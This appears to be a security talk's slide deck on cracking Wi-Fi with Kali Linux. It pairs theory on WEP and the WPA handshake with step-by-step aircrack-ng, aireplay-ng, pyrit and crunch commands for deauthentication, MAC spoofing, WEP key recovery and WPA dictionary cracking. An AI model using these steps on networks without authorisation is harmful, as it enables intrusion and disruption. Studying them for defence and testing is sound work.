2
Most read
4
Most read
18
Most read
Wireless Cracking Using Kali
Asish Agarwalla
Terminology
• SSID (Service Set Identifier)
– An SSID is the Name of a Network
• BSSID (Basic Service Set Identifier)
– MAC address of the access point(AP)
• Wireless Client
Monitor Mode
• Monitor mode allows to monitor all traffic
received from the wireless network without
having associate with an access point or ad
hoc network.
• Create a monitor mode interface
– airmon-ng start <wlan interface>
– Ex: airmon-ng start wlan0
Hidden SSID
• Passive Mode
– Use Wireshark/airodump and wait for any client to
connect to AP
• airodump-ng --channel <channel> --bssid xx.xx.xx.xx.xx.xx
<monitor interface>
• Active Mode
– Sending de-authentication packets using aireplay and
Use Wireshark/airodump to monitor the traffic.
– aireplay-ng –deauth 0 –a <bssid> <monitor mode
interface>
Probe Request and Probe Response packets will contains
the SSID of the network.
Mac Filtering Bypass
• Passive Mode
– Use Wireshark/airodump and wait for any client to connect to AP
– airodump-ng –channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor
interface>
• Active Mode
– Force all connected client to authenticate again by sending de-
authentication packets using aireplay and use Wireshark/ airodump
to monitor the traffic
– aireplay-ng –deauth 0 –a <bssid> <monitor mode interface>
Once we find a whitelisted client's MAC address, we can spoof the MAC
address of the client using the macchanger utility .
WEP (Wired Equivalent Privacy)
Wireless Security
• Two types of WEP authentication
– Open System Authentication
– Shared Key Authentication
• Encrypt all network packages using
– a stream-cipher (RC4) for confidentiality
– a checksum (CRC-32) for integrity know as ICV
• 64 Bit key = 24Bit IV + 40 Bit Key
• 128 Bit Key = 24Bit IV + 104 Bit Key
WEP Encryption
IV(24 Bit) Secret Key(40Bits)+
RC4 Algorithm Data ICV
Cipher Text ICV
WEP Weakness
• IV only 24-bits in WEP, IV must repeat
after 2^24 or ~ 16.7M packets
• IV sent in clear text
• CRC-32 is not cryptographically secure to
authenticate the message
WEP Cracking
1. Start Monitor Mode: airmon-ng start wlan0
2. Identify the target BSSID, SSID, Channel using airodump-ng:
airodump-ng mon0
3. Configured monitor interface to listen on target channel:
iwconfig mon0 channel <no>
4. Capture the packer using airodump:
airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0
5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
WEP Cracking
6. Send deauth packet to a specific client:
aireplay-ng -0 0 -a <BSSID> -c <mac of associated client > mon0
7. Fake authentication:
aireplay -1 0 -e ssid -a <bssid> -h <attacker machine /spoof mac
address> mon0
8. Generate data packets using Arp Replay:
aireplay -3 -b <bssid> -h <attacker machine/connected client mac
address> mon0
9. Crack : aircrack-ng <file.cap>
WEP Packet Decrypting
1. airdecap-ng -w <Shared Key> <captured_file.cap>
2. The decrypted files are stored in a file named captured_file-dec.cap
3. Open the captured_file-dec.cap using wireshark
WPA/WPA2
• WPA uses TKIP encryption algorithm
• WPA2 mandatorily uses the AES-CCMP
algorithm for encryption
• WPA and WPA2 support PSK and EAP-based
authentication
• WPA/WPA2 PSK is vulnerable to a dictionary
attack
WPA/WPA2 4 Ways Handshake
WPA/WPA2 4 Ways Handshake
• Both Client and AP Generate Pairwise Master Key (PMK )
• PMK is derived using the WPA/WPA2 PSK passphrase
supplied by the user, along with the SSID. The
combination of both of these are sent through the
Password Based Key Derivation Function (PBKDF2), which
outputs the 256-bit shared key.
• The AP sends a psuedo-randomly generated Anonce to
the device .
• The device generates its own psuedo-random Snonce.
• The device then uses these two nonces, the MAC address
of the AP, the MAC address of the device, and the PMK, to
create a key called the Pairwise Temporal Key (PTK) which
is 64 bytes, or 512 bits in length
WPA/WPA2 4 Ways Handshake
• The device sends his snonce and a MIC to AP
• Now AP will calculate the PTK using the same
5 parameter and compare its MIC(message
integrity code) with client sent MIC
• If both matches AP singed his anonce using
PTK and send it along with key installation
WPA/WPA2 Dictionary Attack
WPA/WPA2 Cracking
1. Start Monitor Mode: airmon-ng start mon0
2. Identify the target BSSID, SSID, Channel using airodump-ng:
airodump-ng mon0
3. Configured monitor interface to listen on target channel:
iwconfig mon0 channel <no>
4. Capture the packer using airodump:
airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0
5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
6. Crack : aircrack-ng -w <password file> <file.cap>
Speeding up WPA/WPA2 PSK cracking
with PMK
• Generate PMK : Genpmk –f <password file> -d
<output file> -s “SSID”
• cowpatty –d <pmkfile> -s “SSID” -r <captured
file>
• Crack pyrit: pyrit -r <captured file> -i <pmk
file> attack_cowpatty
Speeding up WPA/WPA2 PSK cracking
with PMK
• Import password to pyrit
– pyrit -i <password file> import_passwords
• Create a essid in pyrit
– pyrit -e <ssid> creat_essid
• Generate PMK
– pyrit batch
• Crack using PMK
– pyrit -r <captured file> attack_db
Password File
• crunch <min><max> <letter> -t <guess>
• Ex: crunch 10 10 1234567890 -t
98767@@@@@
Thanks
asishagarwalla@gmail.com
9379773260

More Related Content

PDF
Wi-fi Hacking
PPTX
Wifi cracking Step by Step Using CMD and Kali Linux 2018
PPTX
PPTX
Network security
PPTX
Wireless hacking
PPTX
WLAN Attacks and Protection
PDF
Cracking WPA/WPA2 with Non-Dictionary Attacks
PPTX
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
Wi-fi Hacking
Wifi cracking Step by Step Using CMD and Kali Linux 2018
Network security
Wireless hacking
WLAN Attacks and Protection
Cracking WPA/WPA2 with Non-Dictionary Attacks
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security

What's hot (20)

PPTX
WiFi Secuiry: Attack & Defence
PDF
Wireless Hacking
PPTX
Wi-FI Hacking
PDF
Network Security Fundamentals
PPTX
Wireless Network Security
PPTX
Cisco ASA Firewalls
PPTX
Wireless security using wpa2
PPTX
Authentication, authorization, accounting(aaa) slides
PPTX
Wi Fi Security
PPTX
PPTX
Ssh (The Secure Shell)
PPTX
Brute force attack
PPTX
Wi fi security
PPTX
Network Security
PDF
Wireless Networking Security
PPT
Firewall protection
PPTX
PPT
Wi fi protected access
PPTX
WiFi Secuiry: Attack & Defence
Wireless Hacking
Wi-FI Hacking
Network Security Fundamentals
Wireless Network Security
Cisco ASA Firewalls
Wireless security using wpa2
Authentication, authorization, accounting(aaa) slides
Wi Fi Security
Ssh (The Secure Shell)
Brute force attack
Wi fi security
Network Security
Wireless Networking Security
Firewall protection
Wi fi protected access
Ad

Viewers also liked (15)

PDF
Wi-Fi security – WEP, WPA and WPA2
PPTX
Wpa vs Wpa2
PPTX
802.11r Explained.
PPTX
Wireless Security null seminar
PDF
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
PDF
New flaws in WPA-TKIP
PPTX
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
PPTX
Exploiting WiFi Security
PPTX
Cracking wpa2 psk in the cloud
ODP
Networking- OSI Layer Protocol Functions
PDF
Wi-Fi Hotspot Attacks
PDF
A tutorial showing you how to crack wifi passwords using kali linux!
PPT
Ch06 Wireless Network Security
PPT
Wireless security presentation
PDF
A Guide to 802.11 WiFi Security by US-CERT
Wi-Fi security – WEP, WPA and WPA2
Wpa vs Wpa2
802.11r Explained.
Wireless Security null seminar
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
New flaws in WPA-TKIP
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
Exploiting WiFi Security
Cracking wpa2 psk in the cloud
Networking- OSI Layer Protocol Functions
Wi-Fi Hotspot Attacks
A tutorial showing you how to crack wifi passwords using kali linux!
Ch06 Wireless Network Security
Wireless security presentation
A Guide to 802.11 WiFi Security by US-CERT
Ad

Similar to Wireless Cracking using Kali (20)

PPTX
Wifi cracking
PPTX
Hacking Wireless Networks : Null Delhi (November)
PDF
Hacking Wireless Networks by Mandeep Singh Jadon
PDF
Pentesting Wireless Networks and Wireless Network Security
PPTX
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
PDF
Aircrack
ODP
Feb-8-2012-Breaking-Wireless-Security
PPS
Workshop on Wireless Security
PPS
Sheetal - Wirelesss Hacking - ClubHack2008
PDF
Cracking Wep And Wpa Wireless Networks
PDF
DTS Solution - Wireless Security Protocols / PenTesting
PPTX
Wifi hacking
PDF
PPTX
Wi-Fi Security Presentation.pptx
PPTX
Wireless penetration testing
PPTX
DevLink - WiFu: You think your wireless is secure?
PPT
Wireless and WLAN Secuirty, Presented by Vijay
PDF
Wi-Fi Denver OWASP Presentation Feb. 15, 2017
PPTX
Wi fi hacking
PPT
WiFi practical hacking "Show me the passwords!"
Wifi cracking
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks by Mandeep Singh Jadon
Pentesting Wireless Networks and Wireless Network Security
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
Aircrack
Feb-8-2012-Breaking-Wireless-Security
Workshop on Wireless Security
Sheetal - Wirelesss Hacking - ClubHack2008
Cracking Wep And Wpa Wireless Networks
DTS Solution - Wireless Security Protocols / PenTesting
Wifi hacking
Wi-Fi Security Presentation.pptx
Wireless penetration testing
DevLink - WiFu: You think your wireless is secure?
Wireless and WLAN Secuirty, Presented by Vijay
Wi-Fi Denver OWASP Presentation Feb. 15, 2017
Wi fi hacking
WiFi practical hacking "Show me the passwords!"

More from n|u - The Open Security Community (20)

PDF
Hardware security testing 101 (Null - Delhi Chapter)
PPTX
SSRF exploit the trust relationship
PDF
PDF
Api security-testing
PDF
Introduction to TLS 1.3
PDF
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
PDF
Talking About SSRF,CRLF
PPTX
Building active directory lab for red teaming
PPTX
Owning a company through their logs
PPTX
Introduction to shodan
PDF
Detecting persistence in windows
PPTX
Frida - Objection Tool Usage
PDF
OSQuery - Monitoring System Process
PDF
DevSecOps Jenkins Pipeline -Security
PDF
Extensible markup language attacks
PPTX
PDF
Hardware security testing 101 (Null - Delhi Chapter)
SSRF exploit the trust relationship
Api security-testing
Introduction to TLS 1.3
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Talking About SSRF,CRLF
Building active directory lab for red teaming
Owning a company through their logs
Introduction to shodan
Detecting persistence in windows
Frida - Objection Tool Usage
OSQuery - Monitoring System Process
DevSecOps Jenkins Pipeline -Security
Extensible markup language attacks

Recently uploaded (20)

PDF
Empowerment Technology for Senior High School Guide
PDF
BP 704 T. NOVEL DRUG DELIVERY SYSTEMS (UNIT 2).pdf
PDF
IGGE1 Understanding the Self1234567891011
PDF
My India Quiz Book_20210205121199924.pdf
PPTX
History, Philosophy and sociology of education (1).pptx
DOC
Soft-furnishing-By-Architect-A.F.M.Mohiuddin-Akhand.doc
DOCX
Cambridge-Practice-Tests-for-IELTS-12.docx
PDF
Chinmaya Tiranga quiz Grand Finale.pdf
PDF
David L Page_DCI Research Study Journey_how Methodology can inform one's prac...
PPTX
Computer Architecture Input Output Memory.pptx
PDF
Τίμαιος είναι φιλοσοφικός διάλογος του Πλάτωνα
PPTX
CHAPTER IV. MAN AND BIOSPHERE AND ITS TOTALITY.pptx
PDF
Complications of Minimal Access-Surgery.pdf
PDF
HVAC Specification 2024 according to central public works department
PDF
LDMMIA Reiki Yoga Finals Review Spring Summer
PPTX
A powerpoint presentation on the Revised K-10 Science Shaping Paper
PDF
Vision Prelims GS PYQ Analysis 2011-2022 www.upscpdf.com.pdf
PDF
FOISHS ANNUAL IMPLEMENTATION PLAN 2025.pdf
PPTX
Onco Emergencies - Spinal cord compression Superior vena cava syndrome Febr...
PDF
FORM 1 BIOLOGY MIND MAPS and their schemes
Empowerment Technology for Senior High School Guide
BP 704 T. NOVEL DRUG DELIVERY SYSTEMS (UNIT 2).pdf
IGGE1 Understanding the Self1234567891011
My India Quiz Book_20210205121199924.pdf
History, Philosophy and sociology of education (1).pptx
Soft-furnishing-By-Architect-A.F.M.Mohiuddin-Akhand.doc
Cambridge-Practice-Tests-for-IELTS-12.docx
Chinmaya Tiranga quiz Grand Finale.pdf
David L Page_DCI Research Study Journey_how Methodology can inform one's prac...
Computer Architecture Input Output Memory.pptx
Τίμαιος είναι φιλοσοφικός διάλογος του Πλάτωνα
CHAPTER IV. MAN AND BIOSPHERE AND ITS TOTALITY.pptx
Complications of Minimal Access-Surgery.pdf
HVAC Specification 2024 according to central public works department
LDMMIA Reiki Yoga Finals Review Spring Summer
A powerpoint presentation on the Revised K-10 Science Shaping Paper
Vision Prelims GS PYQ Analysis 2011-2022 www.upscpdf.com.pdf
FOISHS ANNUAL IMPLEMENTATION PLAN 2025.pdf
Onco Emergencies - Spinal cord compression Superior vena cava syndrome Febr...
FORM 1 BIOLOGY MIND MAPS and their schemes

Wireless Cracking using Kali

  • 1. Wireless Cracking Using Kali Asish Agarwalla
  • 2. Terminology • SSID (Service Set Identifier) – An SSID is the Name of a Network • BSSID (Basic Service Set Identifier) – MAC address of the access point(AP) • Wireless Client
  • 3. Monitor Mode • Monitor mode allows to monitor all traffic received from the wireless network without having associate with an access point or ad hoc network. • Create a monitor mode interface – airmon-ng start <wlan interface> – Ex: airmon-ng start wlan0
  • 4. Hidden SSID • Passive Mode – Use Wireshark/airodump and wait for any client to connect to AP • airodump-ng --channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor interface> • Active Mode – Sending de-authentication packets using aireplay and Use Wireshark/airodump to monitor the traffic. – aireplay-ng –deauth 0 –a <bssid> <monitor mode interface> Probe Request and Probe Response packets will contains the SSID of the network.
  • 5. Mac Filtering Bypass • Passive Mode – Use Wireshark/airodump and wait for any client to connect to AP – airodump-ng –channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor interface> • Active Mode – Force all connected client to authenticate again by sending de- authentication packets using aireplay and use Wireshark/ airodump to monitor the traffic – aireplay-ng –deauth 0 –a <bssid> <monitor mode interface> Once we find a whitelisted client's MAC address, we can spoof the MAC address of the client using the macchanger utility .
  • 6. WEP (Wired Equivalent Privacy) Wireless Security • Two types of WEP authentication – Open System Authentication – Shared Key Authentication • Encrypt all network packages using – a stream-cipher (RC4) for confidentiality – a checksum (CRC-32) for integrity know as ICV • 64 Bit key = 24Bit IV + 40 Bit Key • 128 Bit Key = 24Bit IV + 104 Bit Key
  • 7. WEP Encryption IV(24 Bit) Secret Key(40Bits)+ RC4 Algorithm Data ICV Cipher Text ICV
  • 8. WEP Weakness • IV only 24-bits in WEP, IV must repeat after 2^24 or ~ 16.7M packets • IV sent in clear text • CRC-32 is not cryptographically secure to authenticate the message
  • 9. WEP Cracking 1. Start Monitor Mode: airmon-ng start wlan0 2. Identify the target BSSID, SSID, Channel using airodump-ng: airodump-ng mon0 3. Configured monitor interface to listen on target channel: iwconfig mon0 channel <no> 4. Capture the packer using airodump: airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0 5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
  • 10. WEP Cracking 6. Send deauth packet to a specific client: aireplay-ng -0 0 -a <BSSID> -c <mac of associated client > mon0 7. Fake authentication: aireplay -1 0 -e ssid -a <bssid> -h <attacker machine /spoof mac address> mon0 8. Generate data packets using Arp Replay: aireplay -3 -b <bssid> -h <attacker machine/connected client mac address> mon0 9. Crack : aircrack-ng <file.cap>
  • 11. WEP Packet Decrypting 1. airdecap-ng -w <Shared Key> <captured_file.cap> 2. The decrypted files are stored in a file named captured_file-dec.cap 3. Open the captured_file-dec.cap using wireshark
  • 12. WPA/WPA2 • WPA uses TKIP encryption algorithm • WPA2 mandatorily uses the AES-CCMP algorithm for encryption • WPA and WPA2 support PSK and EAP-based authentication • WPA/WPA2 PSK is vulnerable to a dictionary attack
  • 13. WPA/WPA2 4 Ways Handshake
  • 14. WPA/WPA2 4 Ways Handshake • Both Client and AP Generate Pairwise Master Key (PMK ) • PMK is derived using the WPA/WPA2 PSK passphrase supplied by the user, along with the SSID. The combination of both of these are sent through the Password Based Key Derivation Function (PBKDF2), which outputs the 256-bit shared key. • The AP sends a psuedo-randomly generated Anonce to the device . • The device generates its own psuedo-random Snonce. • The device then uses these two nonces, the MAC address of the AP, the MAC address of the device, and the PMK, to create a key called the Pairwise Temporal Key (PTK) which is 64 bytes, or 512 bits in length
  • 15. WPA/WPA2 4 Ways Handshake • The device sends his snonce and a MIC to AP • Now AP will calculate the PTK using the same 5 parameter and compare its MIC(message integrity code) with client sent MIC • If both matches AP singed his anonce using PTK and send it along with key installation
  • 17. WPA/WPA2 Cracking 1. Start Monitor Mode: airmon-ng start mon0 2. Identify the target BSSID, SSID, Channel using airodump-ng: airodump-ng mon0 3. Configured monitor interface to listen on target channel: iwconfig mon0 channel <no> 4. Capture the packer using airodump: airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0 5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0 6. Crack : aircrack-ng -w <password file> <file.cap>
  • 18. Speeding up WPA/WPA2 PSK cracking with PMK • Generate PMK : Genpmk –f <password file> -d <output file> -s “SSID” • cowpatty –d <pmkfile> -s “SSID” -r <captured file> • Crack pyrit: pyrit -r <captured file> -i <pmk file> attack_cowpatty
  • 19. Speeding up WPA/WPA2 PSK cracking with PMK • Import password to pyrit – pyrit -i <password file> import_passwords • Create a essid in pyrit – pyrit -e <ssid> creat_essid • Generate PMK – pyrit batch • Crack using PMK – pyrit -r <captured file> attack_db
  • 20. Password File • crunch <min><max> <letter> -t <guess> • Ex: crunch 10 10 1234567890 -t 98767@@@@@